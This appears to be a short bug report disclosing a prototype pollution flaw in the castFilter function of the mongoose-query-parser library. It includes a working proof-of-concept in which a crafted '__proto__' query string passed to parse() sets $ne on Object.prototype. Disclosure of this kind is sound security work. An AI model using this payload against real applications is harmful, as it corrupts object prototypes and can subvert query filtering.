Potential Prototype pollution

[cstimkong]

I have found a potential prototype pollution in the project in castFilter function.

Here is an example exploit:

const {MongooseQueryParser} = require('mongoose-query-parser');
let parser = new MongooseQueryParser();
parser.parse('__proto__!%3Dpolluted=', {});
// or parser.parse({'__proto__!=polluted': undefined}, {});
console.log(({}).$ne); // output: polluted